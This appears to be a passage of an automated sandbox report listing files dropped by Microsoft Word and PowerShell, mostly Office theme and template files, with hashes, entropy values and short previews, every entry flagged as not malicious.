                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.5323495192404475
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                        SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                        SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                        SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):976001
                                                                                                                                                        Entropy (8bit):7.791956689344336
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.5270134268591966
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                        SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                        SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                        SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1091485
                                                                                                                                                        Entropy (8bit):7.906659368807194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                        MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.5301133500353727
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                        SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                        SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                        SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1204049
                                                                                                                                                        Entropy (8bit):7.92476783994848
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5364757859412563
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                        SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                                        SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                        SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1463634
                                                                                                                                                        Entropy (8bit):7.898382456989258
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.5286004619027067
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                        SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                                                        SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                        SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1750795
                                                                                                                                                        Entropy (8bit):7.892395931401988
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                        MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.528155916440219
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                        SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                        SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                        SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2357051
                                                                                                                                                        Entropy (8bit):7.929430745829162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.516423078177173
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                        SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                        SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                        SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2218943
                                                                                                                                                        Entropy (8bit):7.942378408801199
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.544065206514744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                        SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                        SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                                        SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3078052
                                                                                                                                                        Entropy (8bit):7.954129852655753
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.5303110391598502
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                        SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                        SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                        SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Mesh.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2924237
                                                                                                                                                        Entropy (8bit):7.970803022812704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.5434534344080606
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                        SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                        SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                        SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Main_Event.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3611324
                                                                                                                                                        Entropy (8bit):7.965784120725206
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):288
                                                                                                                                                        Entropy (8bit):3.5359188337181853
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                        SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                        SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                        SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Vapor_Trail.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.4699940532942914
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                        SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                        SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                        SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Insight design set.dotx Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {WD Document Parts}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3465076
                                                                                                                                                        Entropy (8bit):7.898517227646252
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
